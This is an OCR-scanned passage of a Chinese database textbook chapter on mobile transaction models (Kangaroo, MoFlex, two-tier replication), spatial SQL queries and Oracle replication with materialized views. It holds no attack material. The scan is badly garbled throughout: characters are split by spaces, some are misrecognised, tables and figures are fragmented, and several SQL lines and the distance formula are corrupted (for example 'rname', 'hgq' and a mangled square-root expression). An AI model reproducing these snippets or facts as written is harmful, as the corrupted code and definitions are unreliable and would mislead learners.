性 质 也 称 为 事务 移动 (transaction mobility)。 虽 然 懒惰 的 随处 更 新 复制 适用 于 移动 应 用 ， 
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Internet 也 到 处 可 用 ， 还 是 有 专门 为 了 迁移 事务 的 移动 网 或 P2P 环境 。 事务 的 执行 可 能 与 位 
置 有 关 ， 这 对 会 话 一 致 性 有 影响 。 


表 26-1 经 典 (固定 ) 数据 库 应 用 与 移动 数据 库 应 用 的 差别 


本 TIT 
rr 区 
数据 对 象 的 大 小 机 
下 大人 
原子 性 弱 原 子 性 (可 能 完全 无 原子 性 ) 
一 致 性 依赖 于 场景 
名 复 部 分 (补偿 )， 完 全 
正确 性 用 户 自 定义 ， 弱 ACID 或 无 ACID 
事务 期 限 长 
事务 结构 启 平 入 大 

移动 事务 模型 


关于 移动 环境 下 的 新 事务 模型 有 过 若干 提案 ， 诸 如 报告 与 联合 事务 ( Chrysanthis， 
1993 )、 只 隔离 事务 (Lu and Satyanarayanan, 1994 )、 锁 扣 事 务 ( Dirckze and Gruenwald， 
1998 )、 弱 严格 事务 ( Pitoura and Bhargava, 1999 )、Pro-Motion ( Walborn and Chrysanthis, 
1999 ) 和 Moflex 事务 ( Ku and Kim, 2000 )。 下 面 简要 介绍 其 中 几 个 模型 ， 前 三 个 支持 蜂窝 
迁移 ， 后 者 是 复制 模型 。 

Kangaroo (袋鼠 ) 事务 模型 ”该 模型 基于 开放 符 套 事务 和 拆 分 事务 ( 见 22.4 节 ) 的 
概念 ， 支 持 移动 性 和 不 连通 性 。 该 模型 说 明 见 图 26-21。 某 个 移动 主机 开始 一 个 袋鼠 事务 
(KT)， 在 其 连接 的 移动 支持 站 上 就 开始 一 个 子 事务 〈 称 为 幼 袋鼠 )， 比 如 说 JT1。KT 事务 作 
为 开放 同 套 事务 在 固定 主机 上 运行 。 如 果 移 动 主机 变换 了 位 置 ， 前 面 的 JT 被 分 裂 出 一 个 新 
的 JT (比如 叫 JT2 )， 在 新 位 置 的 移动 支持 站 上 继续 运行 。JT1 能 独立 于 JT2 交付 。 


移动 主机 层 










移动 支持 站 层 









固定 主机 层 外 na 区 


图 26-21 袋鼠 事务 举例 


对 袋鼠 事务 存在 两 种 不 同 的 处 理 模式 : 补偿 模式 和 拆 分 模式 。 在 补偿 模式 中 ， 若 有 个 
JT 失败 ， 则 当前 JT 及 以 前 以 后 的 开 统 统 回 退 。 前 面 已 交付 的 所 有 JT 得 到 补偿 。 另 一 方 
面 ， 在 拆 分 模式 中 ， 若 某 个 JT 失败 ， 前 面 已 交付 的 各 JT 不 被 补偿 ， 也 不 初始 化 新 的 JT， 
而 是 交 由 本 地 DBMS 来 决定 交付 还 是 撤销 当前 正 执行 的 JT。 表 26-2 总 结 了 已 提出 的 若干 移 
动 事务 模型 的 差别 。 
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表 26-2 不 同 移动 事务 模型 差异 总 结 


报告 与 联合 事务 


Pro-Motion 





报告 与 联合 事务 ”这 个 模型 也 扩展 了 开放 嵌 套 事务 模型 。 它 考虑 固定 不 变 的 连接 和 运动 
着 的 移动 主机 。 根 事务 负责 控制 在 蜂窝 间 的 移动 ， 类 似 于 袋鼠 模型 。 允 许 子 事务 在 MH 和 
MSS 上 运行 , 但 必须 具有 如 下 某 一 类 型 : 

e@ 可 补偿 。 

e@ 不 可 补偿 。 
报告 事务 。 任何 时 候 都 共享 根 事务 的 部 分 结果 。 者 子 事务 是 独立 的 ， 允 许 为 可 补 
偿 的 。 
联合 事务 。 就 是 互 斥 运行 的 报告 事务 ， 它 是 子 程序 。 它 一 旦 把 结果 暴露 给 父 进程 ， 
它 就 中 断 ， 但 能 在 统一 状态 下 重启 继续 。 

MoFlex MoFlex 模型 是 Flex 事务 模型 的 推广 ， 支 持 下 列 各 类 子 事务 : 

@ 可 补偿 的 。 

e 可 重复 的 。 最 终 成 功 的 事务 ， 可 能 重复 多 次 。 

e@ 枢 轴 (Pivot)。 即 不 可 补偿 也 不 可 重复 的 事务 。 

e 位 置 相关 的 。 如 果子 事务 必须 在 特定 位 置 (蜂窝 ，MSS ) 终止 。 

MoFlex 模型 的 思想 是 建立 一 个 良 构 的 执行 顺序 。 一 个 序 为 良 构 的 仅 当 对 任何 一 个 枢 轴 
事务 都 存在 一 个 可 替换 的 孩子 (路径 )， 它 仅 由 可 重复 的 子 事务 构成 。 一 条 事务 路 径 中 的 每 
个 枢 轴 元 素 定 义 出 一 个 被 保证 的 终止 点 ， 但 也 留 下 某 些 不 可 逆转 的 子 事务 。 MoFlex 丰富 了 
这 样 一 个 隐 含 的 执行 顺序 ， 并 提供 手段 按照 与 时 间 、 代 价 和 位 置 等 相关 的 谓词 来 定义 事务 是 
提交 还 是 撤销 。 终 止 通过 状态 机 定义 ， 若 最 终 状态 是 个 枢 轴 ， 则 执行 ?PC 协议 ， 交 付 当前 
状态 。 如 果 一 个 事务 正 打 算 变 为 可 迁移 ( 见 表 26-3 )， 位 置 相 关 和 补偿 触发 器 这 两 条 性 质 会 
导致 不 同 的 动作 : 

@ 拆 分 后 重 来 (SplitResume)。 拆 分 子 事务 并 交付 已 执行 部 分 。 在 新 的 MSS 上 继续 一 
个 新 的 子 事务 。 
重新 开始 (Restart)。 在 新 的 MSS 上 重新 开始 原来 那个 子 事务 。 

@ 拆 分 后 重新 开始 ( SplitRestart)。 在 老 MSS 上 交付 已 执行 部 分 ， 在 新 的 MSS 上 重新 

开始 整个 事务 。 

e 继续 。 在 新 的 MSS 上 继续 。 

MoFlex 事务 模型 是 唯一 一 个 能 提供 有 保障 执行 的 模型 ， 执 行 甚至 能 依赖 时 间 、 代 价 和 
位 置 。 例 如 ， 它 的 谓词 能 映射 为 这 样 的 谓词 ， 通 过 Pro-Motion 模型 控制 懒惰 主 备份 复制 中 
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的 陈旧 性 ， 即 允许 MH 与 企业 数据 库 间 有 所 协议 。 

只 隔离 ”20 世纪 90 年 代 早 期 最初 开发 这 种 懒惰 随处 更 新 复制 技术 是 为 了 支持 MH 读 
写 UNIX 文件 ， 它 作为 CODA 文件 系统 的 一 个 部 分 。 它 允许 不 连通 操作 ， 即 事务 在 MH 上 
运行 ， 使 用 它 提供 的 文件 缓存 备份 。 这 个 模型 用 到 两 类 不 同 的 事务 : 

e 一 阶 事务 。 它 不 在 复制 和 分 割 的 数据 上 执行 ， 保 证 与 所 有 已 交付 事务 是 可 串 行 的 。 

。 二 阶 事务 。 它 在 复制 或 分 割 的 数据 上 执行 ， 仅 保证 与 其 他 二 阶 事务 在 本 地 (在 同一 

MH 上 ) 是 可 串 行 的 。 

一 旦 这 个 MH 开始 校 验 ， 它 要 确认 是 否 所 有 二 阶 事务 都 与 其 他 并 行 交 付 的 事务 为 可 串 
行 的 ， 若 确认 成 功 就 交付 它们 。 由 于 这 项 严格 的 确认 ， 该 模型 保证 二 阶 事务 的 全 局 可 串 行 
性 。 类 似 于 懒惰 随处 更 新 ， 确 认 失 败 时 下 列 动作 之 一 将 发 生 : 

e 重新 执行 事务 。 

e 应 用 特定 的 调停 。 

e 通知 用 户 手工 解决 冲突 。 

。 撤销 事务 。 

有 趣 的 是 ， 该 模型 也 给 出 一 种 机 制 ， 用 “全 局 验证 序 ” 来 保证 并 发 确认 不 违反 可 串 行 
性 。 该 模型 是 支持 不 连通 数据 处 理 模型 中 较 早 的 一 个 。 


表 26-3 MoFlex 迁移 规则 


可 补偿 
拆 分 后 重 来 
重新 开始 ， 拆 分 后 重新 开始 


两 层 复制 (two-tier replication) Gray 等 人 (1996 ) 在 他 们 那 篇 讨论 复制 的 危险 性 的 著 
名 论文 中 给 出 过 一 种 随处 懒惰 更 新 复制 和 用 于 不 连通 MH 的 事务 处 理 方 法 。 在 他 们 的 模型 
中 ， 对 于 所 访问 的 数据 项 ， 每 个 MH 复制 两 个 版 本 : 

@ 原版 (master version)。 从 对 应 FH 获得 的 最 近 的 数据 项 ， 还 未 被 任何 本 地 事务 处 

理 过 。 

@ 试探 版 ( tentative version)。 最 近 由 本 地 事务 产生 的 值 ， 它 们 在 成 功 确认 之 前 一 直属 

试探 性 的 。 

该 模型 进而 区 分 能 在 MSS 上 运行 的 两 类 事务 : 

。 基 事 务 仅 在 原版 数据 上 执行 ， 并 输出 原版 数据 。 

它们 仅 由 连通 的 MH 执行 。 

e 试探 性 事务 则 当 MH 不 连通 时 执行 ， 它 们 局 部 于 这 个 MH， 并 且 会 创建 复制 数据 的 

一 个 新 试探 版 。 

MH 把 数据 拷贝 到 它们 自己 的 局 部 数据 库 并 且 未 连通 。 不 连通 期 间 ，MH 累积 试探 性 事 
务 , 一 旦 连通 ,它们 将 被 作为 基 事 务 再 次 执行 ， 这 些 事务 车 能 通过 与 26.3.4 节 讨论 过 的 调停 
类 似 的 应 用 特定 的 验证 ， 则 交付 ; 若 事务 再 执行 失败 ， 则 通知 用 户 ， 并 用 原版 替换 掉 试 探 版 
数据 。 

该 技术 也 允许 一 个 MH 的 数据 被 声明 为 原版 。 设 想 DreamHome 可 能 有 这 样 的 场景 : 一 
个 工人 负责 某 处 乡下 的 一 组 客户 ， 为 了 防止 当 他 外 出 时 别人 修改 数据 ， 一 种 好 办 法 就 是 也 许 










不 可 补偿 


0 


仅 在 某 一 段 时 间 内 声明 这 些 客户 由 这 个 特定 的 工人 控制 。 这 样 做 的 好 处 是 数据 既 可 使 用 ， 但 
运行 在 协作 数据 库 上 的 事务 都 作为 试探 性 的 ， 直 至 该 工人 再 次 连 人 。 
查询 处 理 

关于 移动 环境 下 的 查询 处 理 有 若干 问题 需要 讨论 。 在 此 主要 考虑 基于 位 置 的 查询 。 

若 一 个 查询 中 含 至 少 一 个 与 位 置 相 关 的 简单 谓词 或 与 位 置 相 关 的 属性 ， 则 称 为 位 置 知 
晓 查 询 (1location-aware query)。 这 类 查询 的 例子 可 能 是 :“ DreamHome 在 伦敦 有 多 少 处 房 
屋 ?” 若 查询 的 结果 依赖 于 提问 者 的 位 置 ， 则 称 这 类 查询 为 位 置 相关 查询 (location-dependent 
query)。 搜 索 地 处 伦敦 的 房屋 最 直接 的 方法 就 是 通过 城市 的 名 字 或 地 址 。 而 地 址 更 一 般 的 形 
式 是 用 x 和 y 的 坐标 表示 ， 也 称 为 经 纬度 。 

为 了 允许 基于 坐标 的 查询 ， 我 们 可 把 表 扩 充 两 列 。 下 面 这 个 查询 : 


SELECT * FROM Property WHERE latitude = 55.844161 
AND longitude = 一 4.430532 


返回 位 于 佩斯 里 的 大 学 校园 。 为 了 支持 基于 地 址 的 查询 ， 则 需要 在 人 易 读 的 地 址 形式 与 
坐标 形式 之 间 进 行 映 射 。 再 考虑 对 象 还 能 移动 ， 例 如 ，DreamHome 车 队 的 车 或 者 实际 的 用 
户 ， 那么 有 下 列 不 同类 型 的 查询 : 

@ 移动 对 象 数据 库 查询 。 这 类 查询 包括 由 移动 或 固定 的 计算 机 提出 的 查询 ,但 所 查 对 

象 本 身 在 移动 。 这 类 查询 的 一 个 例子 是 :“ 找 出 距 我 车 100 英尺 内 的 所 有 轿车 。” 

e@ 时 空 查询 (spatio-temporal query)。 在 移动 环境 下 ， 对 用 户 查 询 的 回答 可 能 随 位 置 而 
变化 。 也 就 是 说 ， 查 询 结果 依赖 于 查询 的 空间 特性 。 对 一 个 受 位 置 约束 的 查询 ， 查 
询 结果 必须 既 与 查询 相关 ， 对 于 受 限 的 位 置 又 是 有 效 的 。 时 空 查询 包括 所 有 组 合 了 
时 空 维度 的 查询 ， 它 们 一 般 都 与 移动 对 象 相 关联 。 

e 连续 查询 (continuous query)。 这 类 查询 允许 用 户 不 断 获得 新 的 可 用 查询 结果 。 连 
续 查 询 的 例子 可 能 是 :“ 给 出 DreamHome 距 我 10 英里 内 的 所 有 房屋 的 列表 ”， 此 时 ， 
若 司 机 在 不 断 运 动 ， 查 询 结 果 也 将 不 断 变 化 。 

GPS (全 球 定位 系统 ，Global Positioning System) 和 其 他 一 些 技术 利用 用 户 当 前 连接 的 
移动 基站 的 信息 获得 用 户 或 移动 对 象 的 位 置 。 然 而 ， 像 “5 英里 半径 内 ”这 样 的 条 件 还 得 由 
数据 库 来 处 理 ， 这 带 来 若干 问题 : 

@ 数据 交换 和 信息 集成 。 空 间 信息 系统 是 非常 宽泛 的 领域 ， 对 其 讨论 远 远 超出 本 章 

所 为 。 空 间 信息 影响 着 方方面面 ， 比 如 导航 和 地 形 学 、 地 理学 、 图 像 处 理 和 增强 现 
实 ， 甚 至 政治 。 因 此 ， 拥 有 一 套 可 靠 的 数据 格式 标准 和 进行 数据 交换 的 接口 非常 
重要 。 

e 表示 。DBMS 需要 有 数据 类 型 依据 点 、 直 线 、 曲 线 和 多 边 形 来 表示 两 维和 三 维 的 几 

何 形状 ， 计算 它们 的 距离 、 覆 盖 范 围 、 面 积 和 相交 部 分 ( 见 图 26-22 和 图 26-23)。 空 
间 信 息 面向 对 象 的 表示 法 更 合适 表示 几何 形状 。 空 间 信 息 系统 一 般 基于 关系 数据 库 
系统 的 空间 扩展 来 实现 ， 例 如 Oracle Spatial。SQL/MM Part 3 规范 扩展 了 SQL 标 
准 ， 利 用 了 SQL 的 对 象 - 关系 特性 〈 见 第 9 章 )。 该 标准 定义 了 若干 几何 类 型 ( 见 
图 26-24 和 表 26-4) 和 方法 〈 见 表 26-5 )。 这 些 类 型 和 方法 扩展 了 关系 代数 和 SQL 语 
法 ， 引 入 空间 特性 和 功能 ， 能 以 更 方便 的 方式 执行 几何 操作 。 
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图 26-22 一 组 坐标 表示 从 佩斯 里 到 格拉 斯 哥 的 线路 





超 类 ST_Geometry 
ST_Point ST_Curve ST_Surface ST_GeometryCollection 
子 类 
® ( 


ST_MultiPoint ST_MultiCurve ST_MuttiSurface 
® 二 
”DY 


ST_MultiLineString ST_MultiPolygon 


图 26-24 SQL/MM Part 3 标准 中 的 一 些 类 型 (简要 描述 见 表 26-4 ) 


ST_LineString ST_Polygon 


表 26-4 SQL/MM Part 3 标准 中 的 一 些 类 型 


类 型 描 述 
ST_Geometry 基 类 型 ， 子 类 型 是 2D-SDTs 
ST_Point 两 个 坐标 的 点 
ST_Curve 线 ， 点 的 列表 ， 可 能 内 插值 或 封闭 的 
ST_LineString ST_Curve 的 子 类 型 , 线性 内 插值 
ST_CircularString ST_Curve 的 子 类 型 , 可 能 内 插值 
ST_Surface 区 域 


ST_Polygon ST_Surface 的 子 类 型 ， 带 线性 环 
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表 26-5 类 型 ST_Geometry 的 一 些 方法 


方 法 描 述 
ST_Length() 返回 曲线 的 长 度 
ST IsClosed() 车 曲线 封闭 则 返回 整数 
ST_CurveToLine() 返回 类 型 为 ST_LineString 的 曲线 近似 直线 
ST_PointN() 返回 类 型 为 ST_Point 的 某 线段 (类 型 为 LineString) 的 第 nm 个 点 
ST_Area 计算 表面 面积 
ST_Perimeter 多 边 形 的 长 度 
ST_Centroid 计算 质心 


e 索引 。B* 树 是 仅 能 索引 一 维 数 据 的 数据 结构 。 空 间 数 据 经 常 为 两 维 到 三 维 的 结构 ， 
故 需要 更 复杂 的 索引 结构 ， 例 如 R 树 、 四 分 树 、K-D 树 和 BSP 树 (Samet, 2006 ) 。 

e 在 MH 上 处 理 空间 数据 。 前 面 已 看 过 某 些 在 MH 上 复制 数据 的 例子 。 空 间 数据 也 能 
复制 到 MH 本 地 数据 库 中 ， 因 此 ， 移 动 DBMS 
也 应 该 至 少 提供 一 些 在 本 地 处 理 空间 数据 的 功 
能 。 在 MH 上 缓存 空间 和 时 间 的 信息 (Ren 和 
Dunham, 2000 ) 曾 被 建议 作为 减少 移动 网 络 负 
载 且 在 不 连通 时 亦 可 处 理 数 据 的 一 种 方案 。 例 
如 ，SQLite 就 有 称 为 SpatiLite 的 空间 扩展 ， 
它 基于 SQLite 对 R- 树 的 支持 。 


| 例 26.1 》》SQL 空间 扩展 

26-25 显示 一 个 简单 的 坐标 系统 ， 其 中 两 大 块 
面积 ( 灰 和 绿 ) 称 为 区 域 (region)， 五 个 较 小 的 面积 称 
为 场地 na 用 数字 1 到 5 标识 。 _ 图 26-25 一 个 坐标 系统 中 的 区 域 ( 灰 

SQL 空间 扩展 的 想法 是 用 下 面 的 表 来 表示 区 域 : 和 绿 ) 和 场地 (用 数字 标识 ) 

CREATE TABLE Region (ID INTEGER PRIMARY KEY, name CHAR(25), area Polygon); 

INSERT INTO Region VALUES (1, ‘grey’, ((0,0), (0,3), (3,3), (0,3))); 

INSERT INTO Region VALUES (2, ‘green’, ((2,1), (5,1), (5,4), (2,4))); 

正如 CREATE 语句 显示 的 那样 ， 有 个 类 型 Polygon， 它 如 同 SQL 的 数据 类 型 。 该 类 型 
的 格式 是 形 如 P(x,y) 的 坐标 的 数组 。 想 象 一 下 没有 这 样 一 个 类 型 如 何 表示 多 边 形 。 那 将 要 一 
个 单独 的 关系 polygon ， 它 将 关系 point 中 的 元 组 关联 起 来 。 假 如 SQL 语句 要 计算 多 边 形 的 
面积 是 非常 繁琐 的 。 而 且 ， 计算 车 涉及 多 个 多 边 形 可 能 要 求 若干 递归 连接 。 等 价 的 ， 场 地 表 
示 为 : 

CREATE TABLE Property (ID INTEGER PRIMARY KEY, ground Polygon); 

INSERT INTO Property VALUES (1, ((0,2), (1,2), (1,3), (0,3))); 

INSERT INTO Property VALUES (2, ((0,2), (0,3), (3,1), (2,1))); 

INSERT INTO Property VALUES (3, ((2,2), (3,2), (3,3), (2,3))); 

INSERT INTO Property VALUES (4, ((4,2), (5,2), (5,3), (4,3))); 

INSERT INTO Property VALUES (5, ((2,3), (3,3), (3,4), (2,4))); 

空间 扩展 的 SQL 允许 写 如 下 形式 的 查询 ; 

(1) 选择 灰色 区 域内 的 所 有 场地 。 
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SELECT ID 
FROM Property p, Region r 
WHERE rname = 'grey AND contains(r.area, p.ground) 


(2 ) 选择 所 有 与 标号 为 1 且 距 离 大 于 3 英里 的 房屋 : 


SELECT* 

FROM Property p 

WHERE p.id = 1 AND distance (centroid (p.ground), centroid (p.ground)) > 3; 

在 这 个 简单 例子 里 ， 距 离 是 通过 平方 计算 的 ， 类 似 于 曼哈顿 距离 ( 黑 虚 线 箭 头 )。 实 际 
计算 两 点 Pi(x,y) 和 Ps(x,y) 间距 离 的 函数 为 distance(Pi, P2)==W (x2 一 x1) 十 0 一 yp1)*。 

(3 ) 车 格拉 斯 哥 城 需要 一 处 房子 的 场地 在 绿色 区 域 中 占 比 的 信息 ， 则 可 写成 ; 


SELECT (Area(Intersection(r.area, p.ground))/Area(r.area))/100 
FROM Property p, Region r 
WHERE p.id = 3 AND rname = 'green'; <« 


26.5 ”Oracle 中 的 复制 


在 本 章 的 最 后 ， 要 研究 Oracle 11g ( Oracle Corporation，2011e) 中 的 复制 功能 。 在 本 
节 中 ,使 用 该 DBMS 的 术语 ， 即 Oracle 把 关系 看 作 是 由 行 和 列 组 成 的 表 。 附 录 H.2 中 对 
DBMS Oracle 进行 了 介绍 。 


Oracle 的 复制 功能 


Oracle 提供 分 布 式 DBMS 功能 的 同时 ， 也 提供 了 Oracle 高 级 复制 功能 来 支持 同步 或 异 
步 复 制 。 Oracle 复制 对 象 就 是 分 布 数据 库 系统 中 存在 多 个 服务 器 上 的 数据 库 对 象 。 复 制 环 
境 下 ， 在 一 个 站 点 对 某 个 复制 对 象 的 任何 修改 都 将 作用 到 所 有 其 他 站 点 的 副本 上 。Oracle 允 
许 复 制 表 及 其 支持 的 对 象 ， 比 如 视图 、 触 发 器 、 包 、 索 引 和 同义词 。 本 节 简 要 讨论 Oracle 
的 复制 机 制 。 
下 面 从 Oracle 所 支持 的 不 同类 型 复制 的 定义 开始 讨论 。 
复制 组 ”为 了 简化 管理 ，Oracle 使 用 复制 组 ( replication groups) 管理 复制 对 象 。 通 常 ， 
创建 复制 组 来 对 特定 应 用 程序 需要 的 模式 对 象 进行 管理 。 复 制 组 的 对 象 可 以 来 自 几 个 模式 ， 
一 个 模式 也 可 以 包含 来 自 不 同 复制 组 中 的 对 象 。 但 是 ， 一 个 复制 对 象 仅 能 是 一 个 复制 组 的 
成 员 。 
一 个 复制 组 可 存在 于 多 个 复制 结 点 上 。Oracle 复制 环境 支持 两 种 类 型 的 结 点 : 主 结 点 
(master sites) 和 物化 视图 结 点 (materialized view sites) 。 一 个 结 点 可 以 既是 一 个 复制 组 的 主 
结 点 ， 又 是 男 一 个 不 同 复制 组 的 物化 视图 结 点 。 然 而 ， 对 于 同一 个 复制 组 ， 一 个 结 点 不 能 既 
是 主 结 点 又 是 物化 视图 结 点 。 
e 主 结 点 上 的 复制 组 被 叫 作 主 组 ( master group)。 每 个 主 组 有 一 个 确切 的 主 定义 结 点 。 
一 个 复制 组 的 主 定义 结 点 就 是 作为 管理 复制 组 和 组 内 对 象 的 控制 中 心 的 主 结 点 。 

e 一 个 在 物化 视图 结 点 上 的 复制 组 被 叫 作 物化 视图 组 ( materialized view group)， 它 总 
是 基于 一 个 主 组 。 

e 主 结 点 维护 复制 组 中 所 有 对 象 的 一 个 完整 副本 ， 而 在 物化 视图 结 点 上 的 物化 视图 可 
以 包括 主 组 中 全 部 表 数 据 或 其 子 集 。 例 如 ， 若 主 组 STAFF _PROPERTY 包含 表 Staff 
和 PropertyForRent, 那么 参与 一 个 主 组 的 所 有 主 结 点 必须 包含 这 两 个 表 的 完整 副本 。 


器 
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但 一 个 物化 视图 结 点 可 能 仅 包含 Staff 表 的 物化 视图 ， 另 一 个 物化 视图 结 点 有 可 能 包 
含 了 Staff 和 PropertyForRent 这 两 个 表 的 物化 视图 。 

e 在 多 主 复制 环境 中 ， 所 有 主 结 点 之 间 直 接 通 信 传 播 对 本 复制 组 中 数据 的 更 新 。 一 个 
物化 视图 中 包含 某 一 时 间 点 上 表 数 据 的 快照 或 物化 视图 ,通常 需要 周期 性 刷新 ， 以 
跟 主 结 点 同步 。 物 化 视图 能 组 织 成 刷新 组 (refresh groups)。 一 个 刷新 组 内 的 物化 视 
图 可 以 分 属 一 个 或 多 个 物化 视图 组 ， 它 们 只 是 要 求 同 时 刷新 ， 以 保障 在 该 刷新 组 的 
所 有 物化 视图 中 的 数据 在 时 间 上 处 于 同一 事务 一 致 点 上 。 

刷新 类 型 ”Oracle 可 以 按照 如 下 方式 中 的 一 种 刷新 物化 视图 : 

e 完整 (complete)。 管 理 物化 视图 的 服务 器 执行 物化 视图 所 定义 的 查询 。 查 询 的 结果 
集 将 替换 现 有 的 物化 视图 数据 达到 刷新 物化 视图 目的 。Oracle 可 以 为 任何 物化 视图 
执行 完整 的 刷新 。 根 据 满足 所 定义 查询 的 数据 量 的 多 少 ， 一 次 完整 刷新 可 能 要 花费 
比 快 速 刷 新 多 得 多 得 时 间 。 

e 快速 (fast)。 管 理 物化 视图 的 服务 器 首先 识别 自 最 近 一 次 物化 视图 刷新 后 主 表 中 发 
生 的 变化 ， 然 后 将 这 些 变化 用 于 物化 视图 。 当 主 表 更 新 较 少 时 ， 快速 刷新 比 完整 刷 
新 更 高 效 ， 因 为 服务 器 和 网 络 需 复制 数据 较 少 。 快 速 刷 新 只 有 当主 表 存 有 物化 视 
图 日 志 时 才能 够 使 用 。 如 果 不 能 进行 快速 刷新 ， 系 统 引 发 错误 ， 物 化 视图 将 不 被 
刷新 。 

e 强制 (force)。 管 理 物化 视图 的 服务 器 首先 尝试 进行 快速 刷新 ， 如 果 快 速 刷新 失败 ， 
Oracle 执行 完整 刷新 。 

复制 的 类 型 Oracle 支持 四 种 类 型 的 复制 : 物化 视图 复制 、 单 主 复 制 、 多 主 复制 和 混合 

复制 。 

@ 物化 视图 复制 。 一 个 物化 视图 包含 一 个 目标 主 在 单个 时 间 点 上 的 完整 或 部 分 副本 。 
目标 主 既 可 以 是 主 结 点 上 的 一 个 主 表 ， 也 可 能 是 一 个 物化 视图 结 点 上 的 主 物化 视图 。 
所 谓 主 物化 视图 (master materialized view) 就 是 一 个 物化 视图 ， 只 是 对 于 别 的 物化 
视图 来 说 它 如 同一 个 主 一 样 。 多 从 物化 视图 (mnultitier materialized view) 就 是 基于 
另 一 物化 视图 ， 而 不 是 基于 主 表 的 物化 视图 。 有 三 类 物化 视图 : 

加 只 读物 化 视图 。 源 自主 结 点 或 主 物化 视图 结 点 的 表 数 据 ， 被 拷贝 到 一 个 或 多 个 
远程 数据 库 中 ， 在 那 只 能 查询 不 能 修改 。 而 更 新 必须 作用 在 主 结 点 上 ， 这 类 复 
制 如 图 26-26 所 示 ， 客 户 端 应 用 能 查询 在 物化 视图 结 点 上 的 表 Staff 的 只 读物 化 
视图 ， 且 能 修改 主 结 点 上 的 Staff 表 本 身 。 当 物化 视图 结 点 决定 从 主 结 点 刷新 的 
时 候 ， 主 表 中 的 变化 将 会 反映 到 物化 视图 表 中 来 。 只 读物 化 视图 能 用 CREATE 
MATERIALZED VIEW 语句 创建 ， 例 如 : 


CREATE MATERIALIZED VIEW hq.Staff AS 
SELECT * FROM hgq.staff@hq_staff.london.south.com; 


四 可 更 新 物化 视图 。 人 允许 用 户 在 物化 视图 上 通过 执行 相应 操作 ， 插 入 、 修 改 和 删除 
目标 主 表 或 主 物化 视图 中 的 行 ， 如 图 26-27 所 示 。 
可 更 新 物化 视图 也 可 以 只 包含 目标 主 表 数 据 的 子 集 。 可 更 新 物化 视图 或 基于 表 或 基于 别 
的 物化 视图 ， 不 过 基于 的 这 些 物化 视图 须 是 某 个 物化 视图 组 的 一 部 分 ， 这 个 物化 视图 组 又 基 
于 男 一 个 复制 组 。 对 于 可 更 新 物化 视图 所 做 的 修改 刷新 时 都 要 推 回 给 主 结 点 ， 可 更 新 物化 视 
图 必须 属于 一 个 物化 视图 组 。 可 更 新 物化 视图 有 下 列 性 质 : 
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图 26-26 只 读物 化 视图 复制 





图 26-27 可 更 新 物化 视图 复制 


。 它们 总 是 基于 一 个 单独 的 表 ， 虽然 在 子 查询 中 可 能 涉及 多 个 表 。 


e 它们 可 以 增 量 式 (快速 ) 刷新 。 
e 对 可 更 新 物化 视图 所 做 的 修改 总 会 传 回 给 该 物化 视图 的 远程 主 表 或 主 物化 视图 ， 而 


对 主 表 或 主 物化 视图 的 修改 又 会 级 联 到 所 有 其 他 复制 结 点 上 去 。 
一 个 可 更 新 物化 视图 可 用 语句 CREATE MATERIALZED VIEW…FOR UPDATE 创建 ， 


例如 : 
CREATE MATERIALIZED VIEW hq.Staff FOR UPDATE AS 


SELECT * FROM hq.staff@hq_staff.london.south.com; 
下 面 语句 创建 一 个 物化 视图 组 : 
BEGIN 

DBMS_ REPCAT.CREATE MVIEW_ REPGROUP ( 


gname = > hq_repgp， 
master = > hq_stafflondon.south.com ， 
propagation_mode = > ASYNCHRONOUS ); 


END; 
下 面 的 语句 把 物化 视图 hq.sta 任 加 到 上 面 定义 的 物化 视图 组 中 ， 使 其 可 更 新 : 


BEGIN 
DBMS_REPCAT.CREATE MVIEW REPOBJECT ( 
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gname = > ‘hq_repgp’, 
sname = > ‘hq,, 
oname = > ‘staff, 
type = > SNAPSHOT ， 
min_communication = > TRUE); 
END; 
加 可 写 物 化 视图 。 物 化 视图 不 是 任何 物化 视图 组 的 一 部 分 ， 因 此 所 做 修改 无 法 推 回 
到 其 主 结 点 ， 物 化 视图 刷新 时 修改 即 丢失 。 
单 主 复制 ( single master replication)。 支 持 物化 视图 复制 的 单个 主 结 点 提供 机 制 支持 
若干 物化 视图 结 点 。 支 持 一 个 或 多 个 物化 视图 结 点 的 单个 主 结 点 也 能 参与 多 主 结 点 
环境 ， 创 造 一 个 混合 复制 环境 (多 主 复制 与 物化 视图 复制 结合 )。 
多 主 复制 (multimaster replication)。 将 表 复 制 到 一 个 或 多 个 远程 数据 库 中 ， 在 那儿 ， 
表 可 以 被 更 新 。 更 新 将 按照 数据 库 管理 员 为 每 个 复制 组 设 定 的 时 间 间 隅 推送 到 其 他 
数据 库 中 。 这 类 复制 如 图 26-28 所 示 ， 其 中 三 个 主 结 点 间 的 每 条 边 表示 一 个 数据 库 
连接 ( 见 25.7.1 节 )。 有 两 类 多 主 复制 : 
四 同步 。 所 有 修改 被 作用 到 参与 复制 的 所 有 结 点 ， 且 这 件 事 本 身 作为 一 个 单独 的 事 
务 ， 该 事务 若 在 任何 结 点 失败 ， 则 全 线 回 滚 。 
四 异步 。 捕 获 到 本 地 修改 ， 先 存在 队列 里 ， 一 定 间 隔 后 再 传播 和 作用 到 远程 结 点 上 。 
用 这 种 复制 方式 ， 需 一 定时 间 段 后 所 有 结 点 才能 达到 一 致 。 
复制 组 





复制 组 





图 26-28 多 组 复制 


混合 复制 (hybrid replication)。 为 满足 组 织 机 构 的 特定 需求 ， 可 以 将 多 主 复制 与 物 
化 视图 复制 结合 起 来 。 在 混合 复制 中 ， 每 个 主 表 可 有 若干 个 主 结 点 和 多 个 物化 视图 
结 点 。 这 类 复制 如 图 26-29 所 示 ， 用 两 个 分 别名 为 london.south.com 和 bristol.west. 
com 的 主 结 点 维持 着 复制 组 。 在 两 个 主 结 点 间 有 个 双向 的 箭头 ， 说 明 每 个 结 点 都 有 
一 个 到 另 一 主 结 点 的 数据 库 连 接 。 物 化 视图 结 点 glasgow.north.com 和 edinburgh. 
north.com ， 每 个 都 保持 了 一 个 复制 组 ， 其 主 结 点 为 london.south.com。 而 物化 视图 
结 点 aberdeen.north.com 也 保持 了 一 个 复制 组 ， 但 其 主 结 点 为 bristol.west.com。 每 
个 物化 视图 结 点 到 其 主 结 点 间 有 一 单 向 箭头 ， 表 示 物 化 视图 结 点 到 主 结 点 的 数据 库 
连接 。 

冲突 消解 ”在 26.3.4 节 的 结束 部 分 曾 讨论 过 在 分 布 式 环境 中 的 冲突 消解 问题 。 在 复制 环 
境 中 若 允 许 在 多 个 结 点 上 对 同一 数据 项 并 行 修改 ， 复 制 冲 突 就 可 能 发 生 。 复 制 环境 中 有 三 类 
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主要 的 冲突 : 
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物化 视图 
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图 26-29 混合 复制 


